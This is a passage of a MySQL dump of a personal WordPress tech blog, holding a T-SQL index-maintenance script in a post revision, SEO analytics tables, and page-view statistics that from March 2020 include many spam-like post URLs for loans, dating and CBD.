@Loop + 1;\n END</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:paragraph -->\n<p>Reorganize:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>DECLARE @Loop int\nDECLARE @Loop2 int\nDECLARE @MaxLoop int\nDECLARE @MaxLoop2 int\nDECLARE @DBName varchar(300)\nDECLARE @SQL varchar(max)\n\nSET @Loop = 1\nSET @DBName = \'\'\n\nset nocount on\nSET @MaxLoop = (select count([name]) FROM sys.databases where [name] like \'%\')\nWHILE @Loop <= @MaxLoop\n BEGIN\n SET @DBName = (select TableWithRowsNumbers.name from (select ROW_NUMBER() OVER (ORDER by [name]) as Row,[name] FROM sys.databases where [name] like \'Z%\' ) TableWithRowsNumbers where Row = @Loop)\n SET @SQL = \'USE [\' + @DBName + \']\'\n print (@SQL)\n exec (@SQL)\n \n SET @Loop2 = 1\n\n SET @MaxLoop2 = (\n SELECT \n Count(indexstats.database_id) \n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n );\n WHILE @Loop2 <= @MaxLoop2\n begin\n set @SQL = \n (\n select xx.cmd from \n (\n SELECT \n ROW_NUMBER() OVER (ORDER by indexstats.avg_fragmentation_in_percent) as Row,\n indexstats.database_id ,\n dbschemas.[name] as \'Schema\',\n dbtables.[name] as \'Table\',\n dbindexes.[name] as \'Index\',\n indexstats.avg_fragmentation_in_percent,\n indexstats.page_count,\n \'alter index \' + dbindexes.[name] + \' on \' + dbschemas.[name] + \'.\' + dbtables.[name] + \' reorganize;\' as cmd\n FROM sys.dm_db_index_physical_stats (DB_ID(), NULL, NULL, NULL, NULL) AS indexstats\n INNER JOIN sys.tables dbtables on dbtables.[object_id] = indexstats.[object_id]\n INNER JOIN sys.schemas dbschemas on dbtables.[schema_id] = dbschemas.[schema_id]\n INNER JOIN sys.indexes AS dbindexes ON dbindexes.[object_id] = indexstats.[object_id]\n AND indexstats.index_id = dbindexes.index_id\n WHERE indexstats.database_id = DB_ID()\n ) xx where Row = @Loop2\n )\n exec (@SQL)\n print (@SQL)\n \n set @Loop2 = @Loop2+1;\n end\n set @Loop = @Loop + 1;\n END\n</code></pre>\n<!-- /wp:code -->','Rebuild and Reorganize all indexes within a database','','inherit','closed','closed','','66-revision-v1','','','2020-02-02 21:14:11','2020-02-02 21:14:11','',66,'http://ictbank.ir/blog/index.php/2020/02/02/66-revision-v1/',0,'revision','',0),
(81,2,'2020-02-02 21:29:14','0000-00-00 00:00:00','<pre class=\"easycode; title: code;lang:;\"> echo hi</pre>\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">echo hi;\nselect * from emp;</pre>\n<!-- /wp:syntaxhighlighter/code -->','sss','','draft','open','open','','','','','2020-02-02 21:29:14','2020-02-02 21:29:14','',0,'http://ictbank.ir/blog/?p=81',0,'post','',0),
(82,2,'2020-02-02 21:19:59','2020-02-02 21:19:59','<pre>echo hi\n</pre>','sss','','inherit','closed','closed','','81-revision-v1','','','2020-02-02 21:19:59','2020-02-02 21:19:59','',81,'http://ictbank.ir/blog/index.php/2020/02/02/81-revision-v1/',0,'revision','',0),
(83,2,'2020-02-02 21:21:11','2020-02-02 21:21:11','<pre class=\"easycode; title: code;lang:;\"> echo hi</pre>','sss','','inherit','closed','closed','','81-revision-v1','','','2020-02-02 21:21:11','2020-02-02 21:21:11','',81,'http://ictbank.ir/blog/index.php/2020/02/02/81-revision-v1/',0,'revision','',0),
(84,2,'2020-02-02 21:28:13','2020-02-02 21:28:13','<pre class=\"easycode; title: code;lang:;\"> echo hi</pre>\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">echo hi;\nselect * from emp;</pre>\n<!-- /wp:syntaxhighlighter/code -->','sss','','inherit','closed','closed','','81-revision-v1','','','2020-02-02 21:28:13','2020-02-02 21:28:13','',81,'http://ictbank.ir/blog/index.php/2020/02/02/81-revision-v1/',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts2` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_rank_math_analytics_keyword_manager`
--
DROP TABLE IF EXISTS `wp_rank_math_analytics_keyword_manager`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rank_math_analytics_keyword_manager` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`keyword` varchar(1000) NOT NULL,
`collection` varchar(200) DEFAULT NULL,
`is_active` tinyint(1) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_rank_math_analytics_keyword_manager`
--
LOCK TABLES `wp_rank_math_analytics_keyword_manager` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_analytics_keyword_manager` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_rank_math_analytics_keyword_manager` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_rank_math_analytics_objects`
--
DROP TABLE IF EXISTS `wp_rank_math_analytics_objects`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rank_math_analytics_objects` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`created` timestamp NOT NULL,
`title` text NOT NULL,
`page` varchar(500) NOT NULL,
`object_type` varchar(100) NOT NULL,
`object_subtype` varchar(100) NOT NULL,
`object_id` bigint(20) unsigned NOT NULL,
`primary_key` varchar(255) NOT NULL,
`seo_score` tinyint(4) NOT NULL DEFAULT 0,
`page_score` tinyint(4) NOT NULL DEFAULT 0,
`is_indexable` tinyint(1) NOT NULL DEFAULT 1,
`schemas_in_use` varchar(500) DEFAULT NULL,
`desktop_interactive` double DEFAULT 0,
`desktop_pagescore` double DEFAULT 0,
`mobile_interactive` double DEFAULT 0,
`mobile_pagescore` double DEFAULT 0,
`pagespeed_refreshed` timestamp NULL DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `analytics_object_page` (`page`(190))
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_rank_math_analytics_objects`
--
LOCK TABLES `wp_rank_math_analytics_objects` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_analytics_objects` DISABLE KEYS */;
INSERT INTO `wp_rank_math_analytics_objects` VALUES
(1,'2023-11-01 02:47:52','Block an IP address in firewall-cmd','/block-an-ip-address-in-firewall-cmd/','post','post',760,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(2,'2023-08-05 02:33:16','Change font in Moodle','/change-font-in-moodle/','post','post',752,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(3,'2023-05-10 14:51:13','posts_os','/posts_os/','post','page',741,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(4,'2025-09-23 01:16:18','Home Page','/','post','page',647,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(5,'2024-04-13 03:11:48','Database related posts','/category-database/','post','page',630,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(6,'2023-05-01 12:31:53','Setup High Availability for HAProxy','/setup-high-availability-for-haproxy/','post','post',615,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(7,'2023-05-01 12:37:43','sudo without password','/sudo-without-password/','post','post',603,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(8,'2023-05-01 12:39:59','PHP: mysqli_connect(): The server requested authentication method unknown to the client [caching_sha2_password]','/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','post',583,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(9,'2023-05-02 10:47:59','Hosting a Podcast','/hosting-a-podcast/','post','post',329,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(10,'2023-05-02 10:49:25','Fedora 33: Problem with Broadcom Wifi Device','/fedora-33-problem-with-broadcom-wifi-device/','post','post',312,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(11,'2023-05-02 13:30:04','How to make Apache HTTPD Web Server more secure','/how-to-make-apache-web-server-more-secure/','post','post',305,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(12,'2020-03-30 04:35:48','One way to Prevent DDOS attacks in WordPress','/one-way-to-prevent-ddos-attacks-in-wordpress/','post','post',150,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(13,'2020-03-25 20:22:03','Connection Encryption in Oracle Database','/connection-encryption-in-oracle-database/','post','post',110,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(14,'2022-11-23 03:36:11','How to setup a loadbalancer with HAProxy in RedHat 7','/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','post',104,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(15,'2020-03-25 20:22:18','Add New Disk to RedHat-based Linux without reboot','/add-new-disk-to-redhat-based-linux-without-reboot/','post','post',97,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(16,'2020-03-25 20:22:25','Change the Character Set & Collation of a table','/change-the-character-set-collation-of-a-table/','post','post',68,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(17,'2020-03-25 20:22:33','Rebuild and Reorganize all indexes within a database','/rebuild-and-reorganize-all-indexes-within-a-database/','post','post',66,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(18,'2020-03-25 20:22:42','Backup/Restore Progress','/backup-restore-progress/','post','post',64,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(19,'2020-03-25 20:22:49','Database Startup Error: Fatal NI connect error 12547','/database-startup-error-fatal-ni-connect-error-12547/','post','post',60,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(20,'2022-12-03 08:06:11','IMPDP Errors: ORA-02374, ORA-12899','/impdp-errors-ora-02374-ora-12899/','post','post',56,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(21,'2024-04-14 07:20:01','About Me','/about-me/','post','page',51,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00'),
(22,'2020-03-25 20:23:04','Grid Infrastructure & Oracle Database 12c – Preinstallation tasks','/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','post',27,'',0,0,1,'Article',0,0,0,0,'0000-00-00 00:00:00');
/*!40000 ALTER TABLE `wp_rank_math_analytics_objects` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_rank_math_internal_links`
--
DROP TABLE IF EXISTS `wp_rank_math_internal_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rank_math_internal_links` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`url` varchar(255) NOT NULL,
`post_id` bigint(20) unsigned NOT NULL,
`target_post_id` bigint(20) unsigned NOT NULL,
`type` varchar(8) NOT NULL,
PRIMARY KEY (`id`),
KEY `link_direction` (`post_id`,`type`),
KEY `target_post_id` (`target_post_id`)
) ENGINE=InnoDB AUTO_INCREMENT=45 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_rank_math_internal_links`
--
LOCK TABLES `wp_rank_math_internal_links` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_internal_links` DISABLE KEYS */;
INSERT INTO `wp_rank_math_internal_links` VALUES
(37,'https://moodle.org/',752,0,'external'),
(38,'http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/',615,104,'internal'),
(39,'https://www.buzzsprout.com',329,0,'external'),
(40,'https://www.spreaker.com/',329,0,'external'),
(41,'https://transistor.fm',329,0,'external'),
(42,'https://www.podbean.com',329,0,'external'),
(43,'https://anchor.fm',329,0,'external'),
(44,'https://www.podbean.com',329,0,'external');
/*!40000 ALTER TABLE `wp_rank_math_internal_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_rank_math_internal_meta`
--
DROP TABLE IF EXISTS `wp_rank_math_internal_meta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_rank_math_internal_meta` (
`object_id` bigint(20) unsigned NOT NULL,
`internal_link_count` int(10) unsigned DEFAULT 0,
`external_link_count` int(10) unsigned DEFAULT 0,
`incoming_link_count` int(10) unsigned DEFAULT 0,
PRIMARY KEY (`object_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_rank_math_internal_meta`
--
LOCK TABLES `wp_rank_math_internal_meta` WRITE;
/*!40000 ALTER TABLE `wp_rank_math_internal_meta` DISABLE KEYS */;
INSERT INTO `wp_rank_math_internal_meta` VALUES
(27,0,0,0),
(51,0,0,0),
(56,0,0,0),
(60,0,0,0),
(64,0,0,0),
(66,0,0,0),
(68,0,0,0),
(97,0,0,0),
(104,0,0,1),
(110,0,0,0),
(150,0,0,0),
(305,0,0,0),
(312,0,0,0),
(329,0,6,0),
(583,0,0,0),
(603,0,0,0),
(615,1,0,0),
(630,0,0,0),
(647,0,0,0),
(741,0,0,0),
(752,0,1,0),
(760,0,0,0);
/*!40000 ALTER TABLE `wp_rank_math_internal_meta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_exclusions`
--
DROP TABLE IF EXISTS `wp_statistics_exclusions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_exclusions` (
`ID` bigint(20) NOT NULL AUTO_INCREMENT,
`date` date NOT NULL,
`reason` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`count` bigint(20) NOT NULL,
PRIMARY KEY (`ID`),
KEY `date` (`date`),
KEY `reason` (`reason`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_exclusions`
--
LOCK TABLES `wp_statistics_exclusions` WRITE;
/*!40000 ALTER TABLE `wp_statistics_exclusions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_statistics_exclusions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_historical`
--
DROP TABLE IF EXISTS `wp_statistics_historical`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_historical` (
`ID` bigint(20) NOT NULL AUTO_INCREMENT,
`category` varchar(25) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`page_id` bigint(20) NOT NULL,
`uri` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`value` bigint(20) NOT NULL,
PRIMARY KEY (`ID`),
UNIQUE KEY `page_id` (`page_id`),
UNIQUE KEY `uri` (`uri`),
KEY `category` (`category`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_historical`
--
LOCK TABLES `wp_statistics_historical` WRITE;
/*!40000 ALTER TABLE `wp_statistics_historical` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_statistics_historical` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_pages`
--
DROP TABLE IF EXISTS `wp_statistics_pages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_pages` (
`page_id` bigint(20) NOT NULL AUTO_INCREMENT,
`uri` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`type` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`date` date NOT NULL,
`count` int(11) NOT NULL,
`id` int(11) NOT NULL,
PRIMARY KEY (`page_id`),
UNIQUE KEY `date_2` (`date`,`uri`),
KEY `url` (`uri`),
KEY `date` (`date`),
KEY `id` (`id`),
KEY `uri` (`uri`,`count`,`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4720 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_pages`
--
LOCK TABLES `wp_statistics_pages` WRITE;
/*!40000 ALTER TABLE `wp_statistics_pages` DISABLE KEYS */;
INSERT INTO `wp_statistics_pages` VALUES
(1,'/','home','2020-02-02',3,0),
(2,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-02-02',4,66),
(3,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-02-02',1,68),
(4,'/index.php/2020/02/02/backup-restore-progress/','post','2020-02-02',2,64),
(5,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-02-02',2,60),
(6,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2020-02-02',1,56),
(7,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-02-02',2,27),
(8,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2020-02-03',1,27),
(9,'/','home','2020-02-03',5,0),
(10,'/','home','2020-02-04',10,0),
(11,'/','home','2020-02-05',20,0),
(12,'/','home','2020-02-06',22,0),
(13,'/','home','2020-02-07',21,0),
(14,'/index.php/about-me/','page','2020-02-07',1,51),
(15,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-02-07',1,97),
(16,'/','home','2020-02-08',29,0),
(17,'/','home','2020-02-09',9,0),
(18,'/','home','2020-02-10',14,0),
(19,'/','home','2020-02-11',28,0),
(20,'/index.php/about-me/','page','2020-02-11',1,51),
(21,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-02-11',1,97),
(22,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-02-11',1,68),
(23,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-02-11',1,66),
(24,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-11',4,104),
(25,'/','home','2020-02-12',7,0),
(26,'/','home','2020-02-13',15,0),
(27,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-13',3,104),
(28,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-14',3,104),
(29,'/index.php/about-me/','page','2020-02-14',3,51),
(30,'/index.php/2020/02/02/backup-restore-progress/','post','2020-02-14',1,64),
(31,'/','home','2020-02-14',17,0),
(32,'/','home','2020-02-15',14,0),
(33,'/','home','2020-02-16',9,0),
(34,'/','home','2020-02-17',14,0),
(35,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-17',1,104),
(36,'/','home','2020-02-18',8,0),
(37,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2020-02-18',6,104),
(38,'/','home','2020-02-19',14,0),
(39,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-19',1,104),
(40,'/','home','2020-02-20',14,0),
(41,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-20',2,104),
(42,'/','home','2020-02-21',7,0),
(43,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-21',1,104),
(44,'/','home','2020-02-22',12,0),
(45,'/','home','2020-02-23',5,0),
(46,'/','home','2020-02-24',7,0),
(47,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-24',1,104),
(48,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-02-25',1,104),
(49,'/','home','2020-02-25',15,0),
(50,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2020-02-25',1,60),
(51,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-02-25',3,110),
(52,'/','home','2020-02-26',12,0),
(53,'/index.php/about-me/','page','2020-02-26',1,51),
(54,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-02-26',3,110),
(55,'/index.php/2020/02/02/backup-restore-progress/','post','2020-02-26',1,64),
(56,'/','home','2020-02-27',8,0),
(57,'/','home','2020-02-28',15,0),
(58,'/index.php/about-me/','page','2020-02-28',2,51),
(59,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-02-28',6,97),
(60,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-02-28',1,110),
(61,'/','home','2020-02-29',6,0),
(62,'/','home','2020-03-01',21,0),
(63,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-03-01',1,110),
(64,'/','home','2020-03-02',5,0),
(65,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-03-02',1,110),
(66,'/','home','2020-03-03',13,0),
(67,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-03-03',2,110),
(68,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2020-03-03',1,104),
(69,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-03-03',1,97),
(70,'/','home','2020-03-04',16,0),
(71,'/','home','2020-03-05',13,0),
(72,'/','home','2020-03-06',12,0),
(73,'/index.php/about-me/','page','2020-03-06',1,51),
(74,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-03-06',1,110),
(75,'/','home','2020-03-07',13,0),
(76,'/index.php/about-me/','page','2020-03-07',1,51),
(77,'/','home','2020-03-08',8,0),
(78,'/','home','2020-03-09',6,0),
(79,'/','home','2020-03-10',11,0),
(80,'/','home','2020-03-11',19,0),
(81,'/','home','2020-03-12',23,0),
(82,'/','home','2020-03-13',5,0),
(83,'/','home','2020-03-14',21,0),
(84,'/index.php/about-me/','page','2020-03-14',1,51),
(85,'/','home','2020-03-15',19,0),
(86,'/','home','2020-03-16',24,0),
(87,'/index.php/about-me/','page','2020-03-16',3,51),
(88,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2020-03-16',1,110),
(89,'/','home','2020-03-17',24,0),
(90,'/','home','2020-03-18',22,0),
(92,'/','home','2020-03-19',314,0),
(93,'/','home','2020-03-20',482,0),
(94,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2020-03-20',2,97),
(95,'/','home','2020-03-21',446,0),
(96,'/','home','2020-03-22',499,0),
(97,'/','home','2020-03-23',38,0),
(98,'/index.php/2020/03/23/great-sales-dissertations-demand-a-large-amount-of/','post','2020-03-23',1,126),
(99,'/index.php/2020/03/23/the-chronicle-was-on-the-list-of-original/','post','2020-03-23',1,128),
(100,'/','home','2020-03-24',36,0),
(101,'/index.php/2020/03/24/choosing-internet-gambling-house-is-without-a/','post','2020-03-24',3,144),
(102,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-03-24',1,150),
(103,'/','home','2020-03-25',48,0),
(104,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2020-03-25',2,150),
(105,'/index.php/about-me/','page','2020-03-25',2,51),
(106,'/index.php/2020/03/11/how-to-find-out-the-scam-on-a-ukrainian-dating-35/','post','2020-03-25',1,146),
(107,'/index.php/2020/03/23/great-sales-dissertations-demand-a-large-amount-of/','post','2020-03-25',1,126),
(108,'/index.php/2020/03/23/the-chronicle-was-on-the-list-of-original/','post','2020-03-25',1,128),
(109,'/index.php/2020/03/24/choosing-internet-gambling-house-is-without-a/','post','2020-03-25',1,144),
(110,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2020-03-25',1,66),
(111,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2020-03-25',1,68),
(112,'/index.php/2020/03/25/bad-credit-loans-that-are-personal-endorsement-11/','post','2020-03-25',1,159),
(113,'/index.php/2020/03/25/bad-credit-figuratively-speaking-with-no-cosigner-160/','post','2020-03-25',1,155),
(114,'/index.php/2020/03/25/bad-credit-no-money-down-automobile-dealerships-49/','post','2020-03-25',1,157),
(115,'/','home','2020-03-26',45,0),
(116,'/index.php/2020/03/25/bad-credit-personal-bank-loan-singapore-quick-cash-14/','post','2020-03-26',1,161),
(117,'/index.php/2020/03/25/rubik-to-save-the-day-the-rubik-s-cube-activates-149/','post','2020-03-26',1,169),
(118,'/index.php/2020/03/25/bad-credit-figuratively-speaking-with-no-cosigner-20/','post','2020-03-26',1,167),
(119,'/index.php/2020/03/25/beautiful-russian-girls-52/','post','2020-03-26',1,171),
(120,'/index.php/2020/03/25/refinancing-2/','post','2020-03-26',1,163),
(121,'/index.php/2020/03/25/bad-credit-tenant-debts-for-an-urgent-situation/','post','2020-03-26',1,175),
(122,'/index.php/2020/03/25/bad-credit-payday-loans-simple-tips-to-look-for-a-32/','post','2020-03-26',1,173),
(123,'/index.php/2020/03/25/my-runaway-sister-358/','post','2020-03-26',1,165),
(124,'/index.php/2020/03/26/each-time-a-dating-dare-contributes-to-months-of-2/','post','2020-03-26',1,197),
(125,'/index.php/2020/03/26/mexican-brides-dating-on-the-net-provides-numerous/','post','2020-03-26',1,195),
(126,'/index.php/2020/03/26/czech-brides-reviews-associated-with-the-top-10-3/','post','2020-03-26',1,193),
(127,'/index.php/2020/03/26/beautiful-russian-women-55/','post','2020-03-26',1,191),
(128,'/index.php/2020/03/26/cbd-for-arthritis-and-joint-paint-23/','post','2020-03-26',1,209),
(129,'/index.php/2020/03/26/exactly-about-helpful-methods-for-dating-a-woman/','post','2020-03-26',1,205),
(130,'/index.php/2020/03/26/how-do-a-bad-is-got-by-you-credit-loan-3/','post','2020-03-26',1,207),
(131,'/index.php/2020/03/26/simple-tips-to-get-commercial-vehicle-funding-even-3/','post','2020-03-26',1,203),
(132,'/index.php/2020/03/26/bad-credit-payday-advances-66/','post','2020-03-26',1,201),
(133,'/index.php/2020/03/26/bad-credit-payday-loans-simple-tips-to-locate-a-5/','post','2020-03-26',1,199),
(134,'/','home','2020-03-27',27,0),
(135,'/index.php/2020/03/27/argentinian-girls-63/','post','2020-03-27',1,213),
(136,'/index.php/2020/03/27/you-are-told-by-us-great-tips-on-dating-a-russia-9/','post','2020-03-27',1,219),
(137,'/index.php/2020/03/27/cbd-oil-vs-hemp-oil-the-ultimate-guide-28/','post','2020-03-27',1,217),
(138,'/index.php/2020/03/27/females-from-mexico-are-popular-for-a-complete-5/','post','2020-03-27',1,215),
(139,'/index.php/2020/03/26/while-the-true-amounts-of-america-guys-looking-for/','post','2020-03-27',1,211),
(140,'/index.php/2020/03/27/just-just-what-sort-of-loan-am-i-able-to-get-by/','post','2020-03-27',1,221),
(141,'/index.php/2020/03/27/adult-dating-23/','post','2020-03-27',1,223),
(142,'/index.php/2020/03/27/it-s-definitely-not-astonishing-that-men-succumb-2/','post','2020-03-27',1,229),
(143,'/index.php/2020/03/27/nowadays-it-s-not-astonishing-that-increasing-2/','post','2020-03-27',1,233),
(144,'/index.php/2020/03/27/getting-loans-despite-having-a-low-credit-rating-2/','post','2020-03-27',1,231),
(145,'/index.php/2020/03/27/suggestions-to-assist-inform-their-just-exactly/','post','2020-03-27',1,227),
(146,'/index.php/2020/03/27/cbd-oil-vs-hemp-oil-just-what-s-the-difference-in/','post','2020-03-27',1,225),
(147,'/','home','2020-03-28',21,0),
(148,'/index.php/2020/03/28/acquiring-farm-loans-with-bad-credit-simple-tips-5/','post','2020-03-28',1,237),
(149,'/index.php/2020/03/28/vietnamese-brides-find-asian-women-looking-for/','post','2020-03-28',1,243),
(150,'/index.php/2020/03/28/a-lot-of-fish-the-most-popular-internet-dating/','post','2020-03-28',1,235),
(151,'/index.php/2020/03/28/pure-cbd-oil-a-buyers-gu-2-2019-october-28-2019-10/','post','2020-03-28',1,245),
(152,'/index.php/2020/03/28/just-how-long-are-title-loans-for/','post','2020-03-28',1,239),
(153,'/index.php/2020/03/28/heloc-what-exactly-is-a-residence-equity-credit-2/','post','2020-03-28',1,247),
(154,'/index.php/2020/03/28/everybody-who-has-really-heard-of-philippines/','post','2020-03-28',1,241),
(155,'/index.php/2020/03/28/asian-mail-order-brides-129/','post','2020-03-28',1,249),
